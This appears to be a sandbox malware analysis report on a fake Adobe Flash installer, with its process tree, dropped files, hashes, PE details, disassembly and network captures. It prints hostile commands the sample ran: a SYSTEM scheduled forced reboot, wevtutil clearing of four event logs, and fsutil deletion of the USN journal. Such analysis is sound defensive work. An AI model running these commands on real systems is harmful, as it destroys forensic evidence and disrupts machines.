cmd.exe (PID: 3524 cmdline: /c schtasks /Create /SC once /TN drogon /RU SYSTEM /TR 'C:\Windows\system32\shutdown.exe /r /t 0 /f' /ST 10:36:00 MD5: AD7B9C14083B52BC532FBA5948342B98)

schtasks.exe (PID: 3608 cmdline: schtasks /Create /SC once /TN drogon /RU SYSTEM /TR 'C:\Windows\system32\shutdown.exe /r /t 0 /f' /ST 10:36:00 MD5: 2003E9B15E1C502B146DAD2E383AC1E3)

9706.tmp (PID: 3560 cmdline: 'C:\Windows\9706.tmp' \\.\pipe\{EE91B260-F47B-4E8B-B208-21BD25A3C0CE} MD5: 37945C44A897AA42A66ADCAB68F560E0)

cmd.exe (PID: 3656 cmdline: /c wevtutil cl Setup & wevtutil cl System & wevtutil cl Security & wevtutil cl Application & fsutil usn deletejournal /D C: MD5: AD7B9C14083B52BC532FBA5948342B98)

wevtutil.exe (PID: 3688 cmdline: wevtutil cl Setup MD5: 81538B795F922B8DA6FD897EFB04B5EE)

wevtutil.exe (PID: 3748 cmdline: wevtutil cl System MD5: 81538B795F922B8DA6FD897EFB04B5EE)

wevtutil.exe (PID: 3820 cmdline: wevtutil cl Security MD5: 81538B795F922B8DA6FD897EFB04B5EE)

wevtutil.exe (PID: 3844 cmdline: wevtutil cl Application MD5: 81538B795F922B8DA6FD897EFB04B5EE)

fsutil.exe (PID: 3976 cmdline: unknown MD5: B4834F08230A2EB7F498DE4E5B6AB814)

cmd.exe (PID: 3836 cmdline: /c schtasks /Delete /F /TN drogon MD5: AD7B9C14083B52BC532FBA5948342B98)

schtasks.exe (PID: 3928 cmdline: unknown MD5: 2003E9B15E1C502B146DAD2E383AC1E3)

shutdown.exe (PID: 3708 cmdline: C:\Windows\system32\shutdown.exe /r /t 0 /f MD5: 61739432482891F2DC5745CCA0A67028)

LogonUI.exe (PID: 3900 cmdline: 'LogonUI.exe' /flags:0x0 MD5: 3EF0D8AB08385AAB5802E773511A2E6A)

cleanup

Created / dropped Files

C:\Windows\9706.tmp
File Type:	PE32 executable for MS Windows (console) Intel 80386 32-bit
MD5:	D41D8CD98F00B204E9800998ECF8427E
SHA1:	7F10CDA876977CE8C2AFFCFE349A65F6C64D0BDB
SHA-256:	785634393BDB64352EB3705F2E9D3BCAEE754E6B0199C90B4A361A5600FEA3FC
SHA-512:	757F2EC10A018B4019BF9CF5FC26724C168EC0D07AF1E02EE66A5AFBEA9AC6BF255948BEBEE5867E868B3872AA9D40A08644B22F30D3C646F7E1C9AAAEE4BBE6
Malicious:	true
Reputation:	low

C:\Windows\cscc.dat
File Type:	PE32 executable for MS Windows (native) Intel 80386 32-bit
MD5:	D41D8CD98F00B204E9800998ECF8427E
SHA1:	59CD4907A438B8300A467CEE1C6FC31135757039
SHA-256:	682ADCB55FE4649F7B22505A54A9DBC454B4090FC2BB84AF7DB5B0908F3B7806
SHA-512:	9A5FDD0512CAF7AC029C3877CC884286082E4E041F9DC38AB00735DE097D5AC93660671E772737DF3313317D80455048A6059C12ACB6F9AFC32E2E15CB2BBEDF
Malicious:	false
Reputation:	low

C:\Windows\dispci.exe
File Type:	PE32 executable for MS Windows (console) Intel 80386 32-bit
MD5:	D41D8CD98F00B204E9800998ECF8427E
SHA1:	AFEEE8B4ACFF87BC469A6F0364A81AE5D60A2ADD
SHA-256:	8EBC97E05C8E1073BDA2EFB6F4D00AD7E789260AFA2C276F0C72740B838A0A93
SHA-512:	F5DCBF3634AEDFE5B8D6255E20015555343ADD5B1BE3801E62A5987E86A3E52495B5CE3156E4F63CF095D0CEDFB63939EAF39BEA379CCAC82A10A4182B8DED22
Malicious:	false
Reputation:	low

C:\Windows\infpub.dat
File Type:	data
MD5:	D41D8CD98F00B204E9800998ECF8427E
SHA1:	E9EFC622924FB965D4A14BDB6223834D9A9007E7
SHA-256:	14D82A676B63AB046AE94FA5E41F9F69A65DC7946826CB3D74CEA6C030C2F958
SHA-512:	AFC2A8466F106E81D423065B07AED2529CBF690AB4C3E019334F1BEDFB42DC0E0957BE83D860A84B7285BD49285503BFE95A1CF571A678DBC9BDB07789DA928E
Malicious:	false
Reputation:	low

Contacted Domains/Contacted IPs

Contacted Domains

No contacted domains info

Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

IP	Country	ASN	ASN Name	Malicious
192.168.1.1	unknown	unknown	unknown	false
192.168.1.0	unknown	unknown	unknown	false
192.168.1.2	unknown	unknown	unknown	false
23.54.91.27	United States	20940	AKAMAI-ASN1US	false

Static File Info

General
File type:	PE32 executable for MS Windows (console) Intel 80386 32-bit
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	i0YxTJ2SO.exe
File size:	441899
MD5:	fbbdc39af1139aebba4da004475e8839
SHA1:	de5c8d858e6e41da715dca1c019df0bfb92d32c0
SHA256:	630325cac09ac3fab908f903e3b00d0dadd5fdaa0875ed8496fcbb97a558d0da
SHA512:	74eca8c01de215b33d5ceea1fda3f3bef96b513f58a750dba04b0de36f7ef4f7846a6431d52879ca0d8641bfd504d4721a9a96fa2e18c6888fd67fa77686af87
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........&\..G2..G2..G2..?...G2..?...G2......G2......G2..?...G2..G3..G2......G2......G2.Rich.G2.........................PE..L......Y...

File Icon

Static PE Info

General
Entrypoint:	0x4012c0
Entrypoint Section:	.text
Digitally signed:	true
Imagebase:	0x400000
Subsystem:	windows cui
Image File Characteristics:	32BIT_MACHINE, EXECUTABLE_IMAGE
DLL Characteristics:	TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Time Stamp:	0x59EC0396 [Sun Oct 22 02:33:58 2017 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	1
File Version Major:	5
File Version Minor:	1
Subsystem Version Major:	5
Subsystem Version Minor:	1
Import Hash:	e3bda9df66f1f9b2b9b7b068518f2af1

Authenticode Signature

Signature Valid:	false
Signature Issuer:	CN=VeriSign Class 3 Code Signing 2010 CA, OU=Terms of use at https://www.verisign.com/rpa (c)10, OU=VeriSign Trust Network, O="VeriSign, Inc.", C=US
Signature Validation Error:	The digital signature of the object did not verify
Error Number:	-2146869232
Not Before, Not After	12/16/2016 1:00:00 AM 12/18/2017 12:59:59 AM
Subject Chain	CN=Symantec Corporation, OU=STAR Security Engines, O=Symantec Corporation, L=Mountain View, S=California, C=US
Version:	3
Thumbprint:	AD96BB64BA36379D2E354660780C2067B81DA2E0
Serial:	0EBFEA68D677B3E26CAB41C33F3E69DE

Entrypoint Preview

Instruction
push ebp
mov ebp, esp
mov eax, 000012ACh
call 1057CFD8h
mov eax, dword ptr [00408000h]
xor eax, ebp
mov dword ptr [ebp-04h], eax
push esi
mov esi, dword ptr [00404004h]
push edi
call esi
mov edi, eax
test edi, edi
je 1057CDE2h
lea eax, dword ptr [ebp-00001250h]
push eax
mov dword ptr [ebp-00001250h], 00000000h
call esi
push eax
call dword ptr [00404050h]
mov esi, eax
test esi, esi
je 1057CDBEh
cmp dword ptr [ebp-00001250h], 01h
jne 1057CC63h
xor eax, eax
lea ebx, dword ptr [ebx+00000000h]
movzx ecx, word ptr [eax+00406CF0h]
mov word ptr [ebp+eax-0000124Ch], cx
add eax, 02h
test cx, cx
jne 1057CC2Bh
jmp 1057CC98h
mov eax, dword ptr [esi]
push eax
push edi
call dword ptr [00404060h]
mov ecx, dword ptr [esi]
add esp, 08h
lea esi, dword ptr [ecx+02h]
jmp 1057CC45h
lea ecx, dword ptr [ecx+00h]
mov dx, word ptr [ecx]
add ecx, 02h
test dx, dx
jne 1057CC37h
sub ecx, esi
sar ecx, 1
cmp word ptr [eax+ecx*2], 0022h
lea eax, dword ptr [eax+ecx*2]
jne 1057CC45h
add eax, 02h
cmp word ptr [eax], 0020h
jne 1057CC45h
add eax, 02h
lea edx, dword ptr [ebp-0000124Ch]
sub edx, eax
lea ecx, dword ptr [ecx+00h]

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x6d8c	0x64	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x9000	0x7088	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x689a3	0x3488
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x11000	0x1a8	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x4000	0x74	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x2ed3	0x3000	False	0.610188802083	ump; data	6.58410377892	IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.rdata	0x4000	0x302a	0x3200	False	0.81	ump; data	7.17725886834	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0x8000	0x33c	0x200	False	0.048828125	ump; data	0.183338791656	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.rsrc	0x9000	0x7088	0x7200	False	0.166152686404	ump; data	4.20408578098	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x11000	0x24e	0x400	False	0.41796875	ump; data	3.29313868559	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country
RT_ICON	0x9254	0xea8	ump; data	English	United States
RT_ICON	0xa0fc	0x8a8	ump; data	English	United States
RT_ICON	0xa9a4	0x568	ump; GLS_BINARY_LSB_FIRST	English	United States
RT_ICON	0xaf0c	0x10a8	ump; data	English	United States
RT_ICON	0xbfb4	0x25a8	ump; data	English	United States
RT_ICON	0xe55c	0x10a8	ump; data	English	United States
RT_ICON	0xf604	0x468	ump; GLS_BINARY_LSB_FIRST	English	United States
RT_GROUP_ICON	0xfa6c	0x68	ump; MS Windows icon resource - 7 icons, 48x48, 256-colors	English	United States
RT_VERSION	0xfad4	0x450	ump; data	English	United States
RT_MANIFEST	0xff24	0x161	ump; ASCII text, with CRLF line terminators	English	United States

Imports

DLL	Import
KERNEL32.dll	ExitProcess, GetCommandLineW, GetFileSize, CreateProcessW, HeapAlloc, HeapFree, GetModuleHandleW, GetProcessHeap, WriteFile, GetSystemDirectoryW, ReadFile, GetModuleFileNameW, CreateFileW, lstrcatW, CloseHandle, UnhandledExceptionFilter, GetCurrentProcess, TerminateProcess, SetUnhandledExceptionFilter
USER32.dll	wsprintfW
SHELL32.dll	CommandLineToArgvW
msvcrt.dll	wcsstr, memcpy, free, malloc

Version Infos

Description	Data
LegalCopyright	Copyright 1996-2017 Adobe Systems Incorporated
InternalName	Adobe Flash Player Installer/Uninstaller 27.0
FileVersion	27,0,0,170
CompanyName	Adobe Systems Incorporated
LegalTrademarks	Adobe Flash Player
ProductName	Adobe Flash Player Installer/Uninstaller
ProductVersion	27,0,0,170
FileDescription	Adobe Flash Player Installer/Uninstaller 27.0 r0
OriginalFilename	FlashUtil.exe
Translation	0x0409 0x04b0

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Okt 25, 2017 10:19:05.549350977 MESZ	49167	80	192.168.1.16	23.54.91.27
Okt 25, 2017 10:19:05.549423933 MESZ	80	49167	23.54.91.27	192.168.1.16
Okt 25, 2017 10:19:05.549571991 MESZ	49167	80	192.168.1.16	23.54.91.27
Okt 25, 2017 10:19:05.549827099 MESZ	49167	80	192.168.1.16	23.54.91.27
Okt 25, 2017 10:19:05.549864054 MESZ	80	49167	23.54.91.27	192.168.1.16
Okt 25, 2017 10:19:06.408255100 MESZ	80	49167	23.54.91.27	192.168.1.16
Okt 25, 2017 10:19:06.408282995 MESZ	80	49167	23.54.91.27	192.168.1.16
Okt 25, 2017 10:19:06.408633947 MESZ	49167	80	192.168.1.16	23.54.91.27
Okt 25, 2017 10:19:11.537026882 MESZ	49171	80	192.168.1.16	192.168.1.2
Okt 25, 2017 10:19:11.537050009 MESZ	80	49171	192.168.1.2	192.168.1.16
Okt 25, 2017 10:19:12.107522011 MESZ	49171	80	192.168.1.16	192.168.1.2
Okt 25, 2017 10:19:12.107568979 MESZ	80	49171	192.168.1.2	192.168.1.16
Okt 25, 2017 10:19:12.607408047 MESZ	49171	80	192.168.1.16	192.168.1.2
Okt 25, 2017 10:19:12.607438087 MESZ	80	49171	192.168.1.2	192.168.1.16
Okt 25, 2017 10:19:12.633356094 MESZ	49175	80	192.168.1.16	192.168.1.2
Okt 25, 2017 10:19:12.633382082 MESZ	80	49175	192.168.1.2	192.168.1.16
Okt 25, 2017 10:19:13.217000961 MESZ	49175	80	192.168.1.16	192.168.1.2
Okt 25, 2017 10:19:13.217032909 MESZ	80	49175	192.168.1.2	192.168.1.16
Okt 25, 2017 10:19:13.716617107 MESZ	49175	80	192.168.1.16	192.168.1.2
Okt 25, 2017 10:19:13.716655016 MESZ	80	49175	192.168.1.2	192.168.1.16
Okt 25, 2017 10:19:13.901700020 MESZ	49182	80	192.168.1.16	192.168.1.2
Okt 25, 2017 10:19:13.901732922 MESZ	80	49182	192.168.1.2	192.168.1.16
Okt 25, 2017 10:19:14.102214098 MESZ	80	49164	23.54.91.27	192.168.1.16
Okt 25, 2017 10:19:14.102286100 MESZ	49164	80	192.168.1.16	23.54.91.27
Okt 25, 2017 10:19:14.102366924 MESZ	49164	80	192.168.1.16	23.54.91.27
Okt 25, 2017 10:19:14.102390051 MESZ	80	49164	23.54.91.27	192.168.1.16
Okt 25, 2017 10:19:14.232072115 MESZ	49167	80	192.168.1.16	23.54.91.27
Okt 25, 2017 10:19:14.232112885 MESZ	80	49167	23.54.91.27	192.168.1.16
Okt 25, 2017 10:19:14.435813904 MESZ	49182	80	192.168.1.16	192.168.1.2
Okt 25, 2017 10:19:14.435853958 MESZ	80	49182	192.168.1.2	192.168.1.16
Okt 25, 2017 10:19:14.935329914 MESZ	49182	80	192.168.1.16	192.168.1.2
Okt 25, 2017 10:19:14.935369968 MESZ	80	49182	192.168.1.2	192.168.1.16
Okt 25, 2017 10:19:15.028579950 MESZ	49185	80	192.168.1.16	192.168.1.2
Okt 25, 2017 10:19:15.028613091 MESZ	80	49185	192.168.1.2	192.168.1.16
Okt 25, 2017 10:19:15.518414021 MESZ	80	49167	23.54.91.27	192.168.1.16
Okt 25, 2017 10:19:15.518435001 MESZ	80	49167	23.54.91.27	192.168.1.16
Okt 25, 2017 10:19:15.518537998 MESZ	49167	80	192.168.1.16	23.54.91.27
Okt 25, 2017 10:19:15.545139074 MESZ	49185	80	192.168.1.16	192.168.1.2
Okt 25, 2017 10:19:15.545197010 MESZ	80	49185	192.168.1.2	192.168.1.16
Okt 25, 2017 10:19:16.044704914 MESZ	49185	80	192.168.1.16	192.168.1.2
Okt 25, 2017 10:19:16.044728041 MESZ	80	49185	192.168.1.2	192.168.1.16
Okt 25, 2017 10:19:31.113209963 MESZ	80	49167	23.54.91.27	192.168.1.16
Okt 25, 2017 10:19:31.316478968 MESZ	80	49167	23.54.91.27	192.168.1.16
Okt 25, 2017 10:19:31.520481110 MESZ	80	49167	23.54.91.27	192.168.1.16
Okt 25, 2017 10:19:31.928483963 MESZ	80	49167	23.54.91.27	192.168.1.16
Okt 25, 2017 10:19:32.744473934 MESZ	80	49167	23.54.91.27	192.168.1.16
Okt 25, 2017 10:19:34.380484104 MESZ	80	49167	23.54.91.27	192.168.1.16
Okt 25, 2017 10:19:37.652494907 MESZ	80	49167	23.54.91.27	192.168.1.16
Okt 25, 2017 10:19:44.196482897 MESZ	80	49167	23.54.91.27	192.168.1.16
Okt 25, 2017 10:19:57.300494909 MESZ	80	49167	23.54.91.27	192.168.1.16

HTTP Request Dependency Graph

ts-ocsp.ws.symantec.com

HTTP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP	Header	Total Bytes Transfered (KB)
Okt 25, 2017 10:19:05.549827099 MESZ	49167	80	192.168.1.16	23.54.91.27	GET /MFEwTzBNMEswSTAJBgUrDgMCGgUABBRi82PVYYKWGJWdgVNyePy5kYTdqQQUX5r1blzMzHSa1N197z%2Fb7EyALt0CEA7P9DjI%2Fr81bgTYapgbGlA%3D HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Microsoft-CryptoAPI/6.1 Host: ts-ocsp.ws.symantec.com	3
Okt 25, 2017 10:19:06.408255100 MESZ	80	49167	23.54.91.27	192.168.1.16	HTTP/1.1 200 OK Server: nginx/1.10.2 Content-Type: application/ocsp-response Content-Length: 1469 content-transfer-encoding: binary Cache-Control: max-age=419637, public, no-transform, must-revalidate Last-Modified: Mon, 23 Oct 2017 04:49:19 GMT Expires: Mon, 30 Oct 2017 04:49:19 GMT Date: Wed, 25 Oct 2017 08:19:05 GMT Connection: keep-alive Data Raw: 30 82 05 b9 0a 01 00 a0 82 05 b2 30 82 05 ae 06 09 2b 06 01 05 05 07 30 01 01 04 82 05 9f 30 82 05 9b 30 81 9e a2 16 04 14 af f2 0c ff 31 a4 51 0e e1 aa 89 56 f6 a0 cf df 88 11 15 29 18 0f 32 30 31 37 31 30 32 33 30 34 34 39 31 39 5a 30 73 30 71 30 49 30 09 06 05 2b 0e 03 02 1a 05 00 04 14 62 f3 63 d5 61 82 96 18 95 9d 81 53 72 78 fc b9 91 84 dd a9 04 14 5f 9a f5 6e 5c cc cc 74 9a d4 dd 7d ef 3f db ec 4c 80 2e dd 02 10 0e cf f4 38 c8 fe bf 35 6e 04 d8 6a 98 1b 1a 50 80 00 18 0f 32 30 31 37 31 30 32 33 30 34 34 39 31 39 5a a0 11 18 0f 32 30 31 37 31 30 33 30 30 34 34 39 31 39 5a 30 0d 06 09 2a 86 48 86 f7 0d 01 01 05 05 00 03 82 01 01 00 4f 17 f0 c8 73 f0 94 0b b9 22 58 62 c1 30 57 b3 28 4d 71 d5 ba 31 9a 12 d2 e6 e7 3c 82 35 b8 dc 42 2a f8 36 10 4c 8b 3c 87 1e 8f 27 33 23 68 b9 71 49 e1 68 91 24 63 4b 57 18 90 30 40 7b 5c 95 95 d9 01 19 b3 a0 7b 23 08 e8 6f 6c e1 f7 4b 6c 68 da e9 25 31 68 dc 1c cc 4f c0 99 f6 fb a3 f3 a5 93 10 d3 17 bb 27 b0 e7 2d 23 d9 6f 2f 6d 14 43 57 36 40 6d 09 ae 84 0e 41 69 00 77 44 ee ca d9 54 26 9c 87 67 e8 c1 f8 0d a1 b6 44 90 23 e9 20 22 5f f9 4b a3 df ed 1f 35 94 9e 09 5d 6a a7 0e 0e 88 a6 3b 3c b7 9b 5b 29 e5 82 2f 96 fe b8 ee 5c 25 0c 27 6c 3a a3 70 98 2f 24 c2 4e e3 76 47 de 53 cf 9f 17 0f 8c 47 fd 21 ee 32 83 13 81 b4 78 e2 42 c5 f8 ce f9 87 5d 3c 0b 53 e0 67 7d 8c e0 61 9c a8 f4 7d 2d b3 59 80 b6 ec db d4 59 ca 05 ef fa fb 1e 9d 70 25 46 bf 0a 3b 9c 24 f8 a0 82 03 e2 30 82 03 de 30 82 03 da 30 82 02 c2 a0 03 02 01 02 02 10 1b af 02 f5 b8 fc fa 01 4e 80 47 46 73 25 7f 23 30 0d 06 09 2a 86 48 86 f7 0d 01 01 05 05 00 30 5e 31 0b 30 09 06 03 55 04 06 13 02 55 53 31 1d 30 1b 06 03 55 04 0a 13 14 53 79 6d 61 6e 74 65 63 20 43 6f 72 70 6f 72 61 74 69 6f 6e 31 30 30 2e 06 03 55 04 03 13 27 53 79 6d 61 6e 74 65 63 20 54 69 6d 65 20 53 74 61 6d 70 69 6e 67 20 53 65 72 76 69 63 65 73 20 43 41 20 2d 20 47 32 30 1e 17 0d 31 36 31 32 31 33 30 30 30 30 30 30 5a 17 0d 32 31 31 32 33 31 32 33 35 39 35 39 5a 30 46 31 44 30 42 06 03 55 04 03 13 3b 53 79 6d 61 6e 74 65 63 20 54 69 6d 65 20 53 74 61 6d 70 69 6e 67 20 53 65 72 76 69 63 65 73 20 43 41 20 2d 20 47 32 20 53 48 41 31 20 4f 43 53 50 20 52 65 73 70 6f 6e 64 65 72 30 82 01 22 30 0d 06 09 2a 86 48 86 f7 0d 01 01 01 05 00 03 82 01 0f 00 30 82 01 0a 02 82 01 01 00 86 45 f0 3c 53 d4 0c 3c 26 6d 2a a1 c3 a5 ed 80 18 55 80 ec 8c f0 54 5b db 9e d0 0e d5 96 c5 99 82 55 2a 7e 32 c0 15 ae 4c cd e3 c6 07 53 4f 71 be ab f5 58 99 39 8f f7 c7 d6 33 35 e4 0c 6d 18 80 7a d7 0a 55 7b fd 6a 8a 8d 9b 69 d3 a7 48 f2 c1 bd 90 6e 33 cc 02 ef 1f 0d 69 69 9f f3 36 2a 8f c6 e3 14 10 7c 53 b3 66 1f 6e ec 8e a8 cd 6b e1 c9 19 a1 9c 39 96 8a 6f 9c 2c 5f 84 d9 de 5f bb af 3c 1d 31 e2 7a db 68 96 0f 9e ab 9d 49 8f 9a 8d 2f c3 d6 b8 73 7a 04 24 80 34 fa 9f 74 bb a8 59 a3 a7 f9 39 c7 4e 10 1a a1 d8 52 4e 16 a1 4c 4c b4 43 fe 47 df e3 29 08 0e 53 6c df 40 5e cb f6 d3 59 09 63 cb 6f c5 f4 fa e1 71 14 35 88 00 82 41 2f f0 4a 20 81 6d 84 81 61 ed 5e 8e 74 b0 35 e0 cc 2f b1 c3 e8 9c e3 a0 61 a4 66 be 72 70 ff fb f1 4a 0a 42 e7 50 ca 73 a8 98 fc 13 9b 02 03 01 00 01 a3 81 ab 30 81 a8 30 0c 06 03 55 1d 13 01 01 ff 04 02 30 00 30 13 06 03 55 1d 25 04 0c 30 0a 06 08 2b 06 01 05 05 07 03 09 30 0e 06 03 55 1d 0f 01 01 ff 04 04 03 02 07 80 30 0f 06 09 2b 06 01 05 05 07 30 01 05 04 02 05 00 30 22 06 03 55 1d 11 04 1b 30 19 Data Ascii: 00+0001QV)20171023044919Z0s0q0I0+bcaSrx_n\t}?L.85njP20171023044919Z20171030044919Z0HOs"Xb0W(Mq1<5B6L<'3#hqIh$cKW0@{\{#olKlh%1hO'-#o/mCW6@mAiwDT&gD# "_K5]j;<[)/\%'l:p/$NvGSG!2xB]<Sg}a}-YYp%F;$000NGFs%#0H0^10UUS10USymantec Corporation100.U'Symantec Time Stamping Services CA - G20161213000000Z211231235959Z0F1D0BU;Symantec Time Stamping Services CA - G2 SHA1 OCSP Responder0"0H0E<S<&mUT[U~2LSOqX935mzU{jiHn3ii6*\|Sfnk9o,__<1zhI/sz$4tY9NRNLLCG)Sl@^Ycoq5A/J ma^t5/afrpJBPs00U00U%0+0U0+00"U0	4
Okt 25, 2017 10:19:06.408282995 MESZ	80	49167	23.54.91.27	192.168.1.16	Data Raw: a4 17 30 15 31 13 30 11 06 03 55 04 03 13 0a 54 47 56 2d 4f 46 46 2d 36 39 30 1d 06 03 55 1d 0e 04 16 04 14 af f2 0c ff 31 a4 51 0e e1 aa 89 56 f6 a0 cf df 88 11 15 29 30 1f 06 03 55 1d 23 04 18 30 16 80 14 5f 9a f5 6e 5c cc cc 74 9a d4 dd 7d ef Data Ascii: 010UTGV-OFF-690U1QV)0U#0_n\t}?L.0*H(J.FR}7/ ~<qRb7Atze{<qOZ>'80eQzwSmQYvM\>brkF$\|Z!%!S^XS:	5
Okt 25, 2017 10:19:14.232072115 MESZ	49167	80	192.168.1.16	23.54.91.27	GET /MFEwTzBNMEswSTAJBgUrDgMCGgUABBQd11mpyHEqFCSocj4SCu93CBydHAQUr2PWyqNOhXLgp7xB8ymiOH%2BAdWICEFRY8qrXQdZEvISpe6CWUuY%3D HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Microsoft-CryptoAPI/6.1 Host: ts-ocsp.ws.symantec.com	17
Okt 25, 2017 10:19:15.518414021 MESZ	80	49167	23.54.91.27	192.168.1.16	HTTP/1.1 200 OK Server: nginx/1.10.2 Content-Type: application/ocsp-response Content-Length: 1589 content-transfer-encoding: binary Cache-Control: max-age=539105, public, no-transform, must-revalidate Last-Modified: Tue, 24 Oct 2017 14:02:01 GMT Expires: Tue, 31 Oct 2017 14:02:01 GMT Date: Wed, 25 Oct 2017 08:19:14 GMT Connection: keep-alive Data Raw: 30 82 06 31 0a 01 00 a0 82 06 2a 30 82 06 26 06 09 2b 06 01 05 05 07 30 01 01 04 82 06 17 30 82 06 13 30 81 9e a2 16 04 14 d7 13 bb f6 52 bf e9 00 ca 1f 87 36 96 e5 fa 2e 46 75 48 89 18 0f 32 30 31 37 31 30 32 34 31 34 30 32 30 31 5a 30 73 30 71 30 49 30 09 06 05 2b 0e 03 02 1a 05 00 04 14 1d d7 59 a9 c8 71 2a 14 24 a8 72 3e 12 0a ef 77 08 1c 9d 1c 04 14 af 63 d6 ca a3 4e 85 72 e0 a7 bc 41 f3 29 a2 38 7f 80 75 62 02 10 54 58 f2 aa d7 41 d6 44 bc 84 a9 7b a0 96 52 e6 80 00 18 0f 32 30 31 37 31 30 32 34 31 34 30 32 30 31 5a a0 11 18 0f 32 30 31 37 31 30 33 31 31 34 30 32 30 31 5a 30 0d 06 09 2a 86 48 86 f7 0d 01 01 05 05 00 03 82 01 01 00 24 bb 19 33 14 54 7b 74 fd f0 45 4c 5d c1 ef ac d0 28 ad f4 11 b2 cf db 13 77 36 07 52 a7 72 31 be 76 55 e9 1d d0 fd 9f 41 7f ea 87 d8 0e 8b ca 24 91 f5 6e d2 58 e1 fe 48 97 6d 63 8f 24 56 8d 51 c2 f6 ee 77 6f df 4e 21 ca ef 3b 3e e1 c6 32 9f 7e 96 96 84 44 6b ed a3 87 c0 65 0d c2 12 f1 d9 f1 69 f2 ab 90 0f df 33 00 22 98 47 0e 5b 85 e2 f2 8b 79 27 1b 4c d1 d9 87 f0 42 62 7b 21 60 15 94 99 a1 d9 4a c6 1b 07 08 5c e0 bf 29 94 ab ae 42 60 b7 f4 74 78 23 01 33 88 80 cd 8a e6 0f 65 9f e3 ca 51 7b aa 6c 50 3b ae 23 d6 fa 68 df 52 75 27 d6 45 76 42 e7 63 09 c4 a4 ba bf cf 6d 42 79 f3 1b 5a 9b 61 dd dd 33 89 29 0b ef e5 28 5c ed 96 b8 7a d6 c3 8e 32 20 9a 02 9f 9f d3 e4 74 40 88 d3 eb f2 40 95 a8 4a 71 a8 07 41 7a ab 71 27 ed 0a 9b 5d b5 bf 14 c3 3a 09 95 7b b2 ea a0 82 04 5a 30 82 04 56 30 82 04 52 30 82 03 3a a0 03 02 01 02 02 10 61 6c b0 aa 9b 5e 44 cc a3 80 d8 ad fb c1 5c aa 30 0d 06 09 2a 86 48 86 f7 0d 01 01 0b 05 00 30 77 31 0b 30 09 06 03 55 04 06 13 02 55 53 31 1d 30 1b 06 03 55 04 0a 13 14 53 79 6d 61 6e 74 65 63 20 43 6f 72 70 6f 72 61 74 69 6f 6e 31 1f 30 1d 06 03 55 04 0b 13 16 53 79 6d 61 6e 74 65 63 20 54 72 75 73 74 20 4e 65 74 77 6f 72 6b 31 28 30 26 06 03 55 04 03 13 1f 53 79 6d 61 6e 74 65 63 20 53 48 41 32 35 36 20 54 69 6d 65 53 74 61 6d 70 69 6e 67 20 43 41 30 1e 17 0d 31 37 30 39 31 30 30 30 30 30 30 30 5a 17 0d 31 37 31 32 30 39 32 33 35 39 35 39 5a 30 39 31 37 30 35 06 03 55 04 03 13 2e 53 79 6d 61 6e 74 65 63 20 53 48 41 32 35 36 20 54 69 6d 65 53 74 61 6d 70 69 6e 67 20 43 41 20 4f 43 53 50 20 52 65 73 70 6f 6e 64 65 72 30 82 01 22 30 0d 06 09 2a 86 48 86 f7 0d 01 01 01 05 00 03 82 01 0f 00 30 82 01 0a 02 82 01 01 00 c5 23 81 9b c8 ca 89 c2 fb 16 3a 43 1b 8a 8d 85 40 9a 3a c7 d1 b3 f3 90 80 ef 3f 1a 35 02 51 1f 01 83 b0 71 cb 52 a6 1f b9 e4 1e 62 1f ea 84 e8 fd dd 7a f6 3b 43 fd 90 6a 3d 81 f0 08 c1 c9 94 88 24 d3 e8 71 6f 7c 5c aa 1c 58 f6 68 c0 d3 86 3b 85 8d 28 b9 00 e2 e2 bb 57 be 3a 55 ec 4b f9 54 e9 57 bd 4a 85 57 f2 8c 2c 7c e6 cb 2b c7 47 cb a8 80 9f 8a 6a f1 d7 5f eb df 46 aa fe ce 72 e8 27 27 87 f0 b3 f8 38 4a de d4 8d 48 18 61 18 19 15 f1 f6 2c 53 55 9f 6d 65 17 4d 7c d0 17 09 38 69 d6 52 f1 f2 18 24 83 23 a6 9e f3 4c 3f d9 f9 